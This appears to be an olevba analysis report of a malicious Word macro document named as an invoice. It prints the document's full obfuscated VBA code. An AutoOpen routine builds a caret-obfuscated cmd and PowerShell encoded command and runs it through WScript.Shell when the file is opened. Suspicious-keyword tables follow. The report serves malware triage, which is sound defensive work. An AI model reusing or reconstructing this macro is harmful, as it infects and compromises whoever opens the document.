//Upload by @defconisov3r //SHA256: 634dfff634ab6496975c3c89ec74d9b0abb61341e6c219b227a7e9c928b519d6 //VT link: https://www.virustotal.com/#/file/634dfff634ab6496975c3c89ec74d9b0abb61341e6c219b227a7e9c928b519d6/detection Flags Filename ----------- ----------------------------------------------------------------- OLE:MAS-HB-- abacocomunitario.org_Invoice =============================================================================== FILE: abacocomunitario.org_Invoice Type: OLE ------------------------------------------------------------------------------- VBA MACRO iCGjuRj.cls in file: abacocomunitario.org_Invoice - OLE stream: u'Macros/VBA/iCGjuRj' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) ------------------------------------------------------------------------------- VBA MACRO jcHcCcqU.bas in file: abacocomunitario.org_Invoice - OLE stream: u'Macros/VBA/jcHcCcqU' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Function jAXolAF() On Error Resume Next VarType 89455 + mquJj / ibRzrz - 85918 HjdKE = 61734 - 99722 PcBtbrpk = "md " + "/V/C" + CStr(Chr(aMPAEGzVSJiP + upqRhiJSvaof + 34 + GzELlppWbYSiSG + flrZiTwwjG)) + "S^e" + "^T^ ^" + " ^ Q" + "y^i" + "^6^=^p^" HjdKE = 66322 - HNGiUF - 92518 + wuPrDK HjdKE = Log(QLQVHo) IsArray 54951 / EOtLt JOOIdvurc = "o^w^er" + "^%he^" + "l^l^" + " -e^ ^J" + "^#^B" + "^[" + "^#/^" + "E^#" + "^e^g^" HjdKE = Sqr(490307260) VarType Tan(RAJtfM) IsArray Cos(90078994) qkFzUNiJ = "#^9" + "^" + "#" + "^G4#ZQ" + "^B^" + "5^#C" + "?^" + "#.w^" + "B^i" + "#^" + "G^o^" + "#ZQ^Bj#" + "^H" HjdKE = swtuPv - DlBuX IsArray CDate(7) PczktabYK = "Q^#" + "I#B" + "O#^G" + "^U#^d" + "#^#:#/" + "c^#" + "Z^Q" + "B^" + "i#EM#^" VarType CBool(uNnTwP) JadXKKWSiq = ".#^Bp#G" + "^U" + "#" + "^." + "g^B^" + "?#^" + "`^%^#^J" + "^#" + "^Br" jAXolAF = PcBtbrpk + JOOIdvurc + qkFzUNiJ + PczktabYK + JadXKKWSiq VarType ijmBj / 60313 + iHIYOX / ssvoqZ End Function Function KJVtVWukFcf() On Error Resume Next IsArray 23391 + CiQfJR IsArray 11241 * MPBVU VarType CStr(PKkwZI) BQBWOB = "^#E8#Z" + "^#^#" + "^9#" + "Cc^#" + "^" + "a#^B" + "?#H" + "^Q#c" + "^#^#}^" + "#C" VarType Tan(90) IsArray CByte(2) IsArray 99163 * QaVwnL - JMjdUl * oipuq HjdKE = CByte(90462 / CbPUKj) XrqUzEOAYcn = "^" + "8#" + "^Lw" + "B^?^#G" + "^U^#cwB" + "^?#`^" + "U#^" + "Lg" + "Bw^#" + "^G^U^#" + "d#^B" + "^" IsArray Rnd(59265 - ilVhYj - 75702 + bUZvmt) GBQqvOdbz = "l^#^H^I" + "#^d^" + "w^Bv" + "#" + "^G8^#Z" + "#^Bp#G" + "^" + "4" + "#Z^w^#" HjdKE = Cos(2024) HjdKE = Round(nLRdPc / zCALR) HjdKE = 17372 * disZGi / 14801 * ECdAm FRMczU = "^:^#" + "G" + "M^#.^w^" + "B'#C8^" + "#SgB" + "^z#E^4#" + "^MQB^Z^" + "#^" + "H" + "^U" + "#d" + "^Q#4^" IsArray iwnJiq + CbkIah * KsGtQ / 61226 HjdKE = CCur(341707968) HjdKE = Oct(71202 / 22511) ijalBNf = "#" + "^E" + "^##a^" + "#B^?^" + "#HQ#" + "c" + "^##}^" HjdKE = Hex(90717 / GSqTT * RSJmo / ihaCN) idjuUwLuiS = "#C" + "8^" + "#^L^" + "wB^" + ":#^G^U#" + "dw^#^" + ":#^G" + "^g^#a^Q" + "^B^%#GE" HjdKE = 46405 + 46326 HjdKE = WQzFA * rICSd IsArray 68633 * SqIXR + mcMqc + 11946 IsArray Rnd(38392 * unKjJ) IsArray CDec(wTvql) VarType bTHHJi + uBKhns UqwzowfTLwL = "^#cg^B^" + "p^#G^" + "8#dQ" + "^B^z" + "#C4^#" + "^YgB" + "l#C^" + "8#" + "c^Q^" + "BK#G^8#" + "c^w^" + "Br^#H" + "c^#^" VarType Oct(NBaSsU) VarType Cos(zmnuR) VarType Sqr(LUZlD) VarType Tan(cGwHb) IsArray XhawXp - 34068 / 6151 - ddbWfQ VarType Oct(EYEhTm) FtBwBuzQfV = "Q^#^Bo^" + "#HQ^" + "#^d#B" + "^w" + "#^`^" + "o^#Lw^#" + "v^" + "#^G?^#Y" + "QBy#" HjdKE = CCur(sDnfwC) VarType 54269 * ObbVi mZlGakhFv = "^GM" + "#aQBh^" + "#^Gw" + "^#ZwBh#" + "^HI#^" + "Y" + "wBp^#" + "G^E#^Lg" VarType Val(nzmfzs - jUdAU + hpWSAc / wLwii) HjdKE = cwiwTW / uAAQY HjdKE = CDec(Puibb) dXYXiYSwIF = "B^" + "j^#^G8#" + "^.Q#^:^" + "#^GI^#c" + "^g^" VarType CDate(JjCXJr) VarType 84591 * FRGSKV HjdKE = CDate(FtsRl) IsArray 6058 - BBiJl + CYbwEr * VjGSBK IsArray CDate(DjzAu / vSsrJK) tzzDKdb = "#v#" + "EM^#_" + "^#^Bm^" + "#/^E^#^" + ".^g^B" VarType SHmvIm / zrdUsw * wQaON / szzZIn VarType TnDmr + hnozJ / 12224 - JSUXEH tZslsokKrl = "##Gg#^" + "d#B" + "^?" + "#H#^#" + "Og^#" + "v^#C^8#" + "d^wB5#" + "Hc" + "^" + "#L^g^B" + "'#^H^" + "U" + "^#^aw" HjdKE = CDate(kGDQw + 35174) VarType 54714 * DfMAR + wjbNP + bMouRc VarType nULhj / ZhAnW + caEHb * 67169 btBzDtWj = "B?#G^8" + "^#^LgB^" + "y^#" + "^HU" + "#c^#^B" + "v^#G^%#" KJVtVWukFcf = BQBWOB + XrqUzEOAYcn + GBQqvOdbz + FRMczU + ijalBNf + idjuUwLuiS + UqwzowfTLwL + FtBwBuzQfV + mZlGakhFv + dXYXiYSwIF + tzzDKdb + tZslsokKrl + btBzDtWj HjdKE = Sin(EUqBZK) End Function Function ImjkiBkZ() On Error Resume Next HjdKE = Hex(2) HjdKE = Rnd(8832) HjdKE = lhKjp + 97834 fzmnaJYvJ = "L^gB^:" + "#^G^U^" + "#d^#" + "^#v#" + "/^M^" + "#Q#Bo" + "^#HQ#" + "d^#^B" + "^w^#" + "^`^o#" + "^" + "L^w#v#^" + "H^o^" VarType Val(zZZGjB) HjdKE = 99754 - vQdzvl * OTriu - UYwmii HjdKE = CVar(MJGSj / 24527 * LVzstu - 77227) dYKIfYC = "#Y^Q" + "Bp#" + "G4#" + "^YQ^B" + "^i#" + "^H^M#" + "^a^" + "Q^B^" + "w" + "#H^I" + "^#YQ#^:" + "^#G^I^#" VarType Atn(353827860) RFEHGiZ = "^.^" + "#" + "^B" + "v^" + "#" + "^Gc#^Lw" + "^Bw^#GY" + "#cgB^[^" + "#E8^#J" + "w" + "#:^#/^M" + "^#c" + "#^B^%#G" HjdKE = Month(411291583) HjdKE = Rnd(5) VarType Val(chWHiJ) MrwvPK = ",#^d^#" + "#^o#Cc#" + "Q^##n#" + "C," + "^#" + "Ow#^" + ",^#^Ec^" + "#^SwBH" IsArray Round(kkPRYs) kPSaKGKrctP = "^" + "#C^##" + "[^" + "Q#g" + "^#C" + "c" + "#N^##" + "^y#^" + "`,^#" VarType 87503 / UBwcnc - dvjkko + cwGqf IsArray Rnd(fhQrR) VarType 84771 - IjnLX * FPPnc - MrCCK HjdKE = VQliU * HFHsLu / 36289 / WSDrGl KjjiSDp = "J^w^#7" + "#C" + "Q^#c" + "^gB?^" + "#" + "^GY^#" + "[^Q" + "^#^," + "^#^G" + "U#^.g" + "B" + "^" IsArray Cos(1767) VarType TypeName(ovKdN) VarType CDbl(WUdSkO) zImbOtUvTza = "2#`^o^" + "#c^" + "#B^1" + "^" + "#GI^#" + ".^#^B" + "^p#^GM" + "^#K^" HjdKE = LCase(WTMBSJ / ImDJP - VQOiw - ttOvS) IsArray Month(lQNGWa - QdFUkb) HjdKE = Cos(251) uBwqwYiUz = "w^#" + "n^#/w^" + "#" + "^" + "J" VarType Hex(BRsfV) HjdKE = CVar(hXHvJt) icJjIOY = "^w" + "^#r^" + "#" + "C^Q^#R^" + "w^B^L" + "#Ec^#^K" + "w#n" + "^#C^" + "4#Z" VarType GNZwM * EVYln IsArray 6101 + KivMr - naSqIX + fzwjaP IsArray KmSXq / TUrCnu UidjZ = "QB^" + "4^#GU" + "^#Jw#7" + "#G" + "Y^#.w" + "^B^" + "y#^" + "GU#YQB" + "j#Gg#K" HjdKE = CDbl(VfoUL) HjdKE = Round(pjLHzE) HjdKE = Atn(6759) IsArray Str(NicjF) sFhBoRG = "^##,^#" + "/^,#^Z" + "gB^Q#C" + "^#^" + "#a" + "QB^:#C" + "#^#" + "^J#^B" ImjkiBkZ = fzmnaJYvJ + dYKIfYC + RFEHGiZ + MrwvPK + kPSaKGKrctP + KjjiSDp + zImbOtUvTza + uBwqwYiUz + icJjIOY + UidjZ + sFhBoRG IsArray Oct(3) VarType 65365 * uPKlEF - JmjEbk / GQwJM End Function Function ZSKiLOqwKsl() On Error Resume Next HjdKE = Atn(dfDoKk) IsArray Oct(820) IsArray Str(94732 * ROSQjE) ZErjONNzN = "r#E8" + "^#Z^##" + "p#^H^%#" + "d#" + "^B^y#H^" + ",#" + "e^w#" + ",^#^E" + "^8#^UQ" + "^" + "B^}" + "^#C4" IsArray 1893 / SKAuvj + 27780 / izYdri HjdKE = 25055 * qmLZi + 5564 * zEERG jijnsZIoG = "^#R^#B" + "v^#^Hc" + "^#.g^B" + "^%^#" + "^G^8" + "#^YQB,#" + "E^Y^#^" + "a^" + "QB^%" + "#GU#^K#" + "^#,#" + "/" + ",^#^" VarType Val(9134) VarType 74595 * KzmwX IsArray Round(1) FriYjjlcfZ = "Z^g^BQ^" + "#C" + "w^" + "#^" + "I##^,^#" + "^H" + "I^" VarType CDbl(jYAoZ) IsArray CDate(QSmpAk + swqbw + WzlZhh - QwWAIk) kslMTwijjJQ = "#^d^#" + "B" + "m^#" + "C^,^" + "#^O^" + "w" IsArray CBool(63865 / YlIzZ / BjaRkM * UBLWt) IsArray CVar(iMozW) HjdKE = Rnd(zQfuIv) HjdKE = NJMiE - dKFBzh / 74963 - HrqhTv NjYZKIBbWip = "^BJ^" + "#^G4" + "^#^" + "d^gBv" + "#G^%#ZQ" + "#'" + "^" + "#E" + "," + "^" VarType Val(aclOj - otwaDN) CzHakr = "#" + "^d^" + "#^B^l#^" + "G^?" + "#I^##^," + "#" + "^" + "H^I^#" HjdKE = QCOjX / WzCudh HjdKE = LdQIzF / fWfifI / vqczN - YvHaQO bmSNKViO = "^d" + "#^B^m#^" + "`^%^#" + "^Y^g^B^" + "y" + "^#" VarType UCLdwl * mFFPak + 61338 + 66824 YwHzzovJWD = "^G^U" + "#^YQ^Br" + "^#`^%#^" + "f" + "Q^Bj^#G" + "^E#^d#" + "^B^" + "j#" + "G" + "g^#" + "e^w^" + "B^9" HjdKE = Sin(HCMSdT * XPVqr) IsArray Atn(TwCdT) YikCquN = "#H^?#^" + "I#^#^g^" + "#" + "C^#" + "^" + "#^" + "I##g#C^" + "#" IsArray TypeName(3) HjdKE = LCase(DXuwNo) wnsvrG = "^#" + "I##^g#" + "C##^I##" + "g#C^#^#" + "^I^" + "##^g" + "^#C#^#I" + "##g#^#" + "==" + "& " + "S^e^" VarType CBool(YjwcX) rolFrIcvwwK = "t ^ ^" + " ^" + "m^" + "a" + "^i=^!^Q" + "^y" + "i^6:^`=" + "D^" + "!&S" + "^e^T " + " ^ ^Y^" ZSKiLOqwKsl = ZErjONNzN + jijnsZIoG + FriYjjlcfZ + kslMTwijjJQ + NjYZKIBbWip + CzHakr + bmSNKViO + YwHzzovJWD + YikCquN + wnsvrG + rolFrIcvwwK VarType CStr(15) HjdKE = Round(FYVcwN) HjdKE = Oct(GodFk) End Function Function Elzojkj() On Error Resume Next VarType 48373 / EbwmH IsArray CStr(IujVK) VarType Oct(wUSDE) rnKMF = "o9=" + "^!^m" + "^a^i^:" + "/^=^" + "F^" IsArray Int(fbvRJ) HjdKE = Hex(YjGzl) VarType CVar(71594 * JRXOHp + 43103 / 89640) hibJd = "!&" + "& S^" + "Et ^ ^" + " ^Mg9^" + "i=^" + "!" + "^Y^o^9^" + ":" + "'^=^t" + "!&& s^" + "E" + "^T ^ " IsArray Round(57018 + JsjXj) tNwRnWprBsG = "^0^H" + "Y=^!^M" + "^g^9^" + "i" + "^:^" + "[=^P!& " + " S^e" + "t ^ ^ " + "^K^m=" + "!^0^HY" + "^" HjdKE = 19838 / EjPcjj - mULtOF / wmpfO wvdktS = ":" + "%=" + "s^!& " + "S^eT" + " ^ " + " ^ X" HjdKE = 74252 - CiDwjX / YBnKvp * bZcHzs VarType CDec(4798) HjdKE = kHScra + oMVfkq + FDsLY + vEkmD IsArray Sqr(74714 * tWXDLN * HKHrTs / wXjUMq) CsvcldcW = "^h=!" + "^K^" + "m" + ":#^=^A" + "!&" + " S^E^" + "t " + "^ ^" + " ^ qo" + "^" VarType 59402 / FMCjd IsArray Round(443) mKBwQVzTKM = "J^a=^" + "!^X^" + "h^" + ":^.^" + "=b!&& S" HjdKE = Rnd(1) IsArray CStr(8) HjdKE = TimeValue(jtAidY) IsArray 40354 / IRSki - 67037 + jhkJZH ZljjstFMz = "^e" + "T" + " ^ ^ " + "^7^8" + "F" + "=^!^q^" + "o^J^a^:" + "}^=6^" + "!&SE^t " + " ^ ^" + " ^1^k" IsArray doXrG + 77616 stDOYWED = "^gx" + "=^!^" + "7^8F:?" + "^=0^!" + "&& s" + "^e^T" + " ^ ^" + "mq=^!" + "^" + "1^k^g" + "^x^:^,^" + "=^k^!&&" VarType Rnd(RLoNO + dYwiw + 75398 / ouMUMk) IsArray Log(jkraBu - obwEw) tjUYUNlLPz = "s^" + "E^" + "T ^" + " ^ ^ ^" + "x^WV" + "=!^mq^:" + "^5" + "=^3^" + "!&& " + " " Elzojkj = rnKMF + hibJd + tNwRnWprBsG + wvdktS + CsvcldcW + mKBwQVzTKM + ZljjstFMz + stDOYWED + tjUYUNlLPz HjdKE = CDate(uVfzE) End Function Function CAwvdI() On Error Resume Next VarType Sgn(iXiAc) VarType 72533 + UqQhaz * 75721 - 24370 FYYcuEm = "se" + "^t ^ Q" + "^" + "F^" + "4=!^x^W" + "V^:^" + ":^=^u" + "!&& " + " s^ET " + "^" VarType Hex(VirquK) VarType CDate(69163 - kwwwi - 36497 - tUGTnj) HjdKE = CDec(79378 - MmuhH + ZskktO - ZfNHk) IsArray CByte(34990 + 97914 * mimIiM + TuqKp) DEznAYUkwM = " ^" + " Y^h^" + "Wq" + "=!Q^F^" + "4^:^" + "_^" + "=T^!&" + " " + " C^a^L^" + "L %Y^" + "h^W" + "q% " VarType VQOzp / COZWf iqDSdsvA = " " + CStr(Chr(RpMYpzOS + iKvYORwDM + 34 + auDorRnBFc + hFlMuoSrc)) + " " + "" CAwvdI = FYYcuEm + DEznAYUkwM + iqDSdsvA HjdKE = DaBwGW * MzZaY HjdKE = Second(69617 * MXdLO - Jlbcn - 10846) HjdKE = rUJSo + QVbJt HjdKE = 51516 - fwiah * 83018 + 42705 End Function ------------------------------------------------------------------------------- VBA MACRO ZvqYdDFdD.bas in file: abacocomunitario.org_Invoice - OLE stream: u'Macros/VBA/ZvqYdDFdD' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub AutoOpen() On Error Resume Next CreateObject("WScript.Shell").Run! ChrW(1 + 3 + 8 + 9 + 46) + UOSVLtjFjkdrbZ + zQXKMuPDmBPw + jAXolAF + KJVtVWukFcf + ImjkiBkZ + ZSKiLOqwKsl + Elzojkj + CAwvdI + JdPEZiKhHGumjm + tUEwiEhQmZzO, 188069728 - 188069728 End Sub +------------+----------------------+-----------------------------------------+ | Type | Keyword | Description | +------------+----------------------+-----------------------------------------+ | AutoExec | AutoOpen | Runs when the Word document is opened | | Suspicious | Chr | May attempt to obfuscate specific | | | | strings (use option --deobf to | | | | deobfuscate) | | Suspicious | ChrW | May attempt to obfuscate specific | | | | strings (use option --deobf to | | | | deobfuscate) | | Suspicious | Shell | May run an executable file or a system | | | | command | | Suspicious | WScript.Shell | May run an executable file or a system | | | | command | | Suspicious | Run | May run an executable file or a system | | | | command | | Suspicious | CreateObject | May create an OLE object | | Suspicious | Hex Strings | Hex-encoded strings were detected, may | | | | be used to obfuscate strings (option | | | | --decode to see all) | | Suspicious | Base64 Strings | Base64-encoded strings were detected, | | | | may be used to obfuscate strings | | | | (option --decode to see all) | | Hex String | 'I\x03\x07&' | 49030726 | | Hex String | '\x90\x07\x89\x94' | 90078994 | | Hex String | '4\x17\x07\x96' | 34170796 | | Hex String | "58'\x86" | 35382786 | | Hex String | 'A\x12\x91X' | 41129158 | | Hex String | '\x18\x80ir' | 18806972 | | Base64 | '\x8d\xc1\xdc\t\xca\ | jcHcCcqU | | String | x94' | | | Base64 | '\xfd_\xc2' | /V/C | | String | | | +------------+----------------------+-----------------------------------------+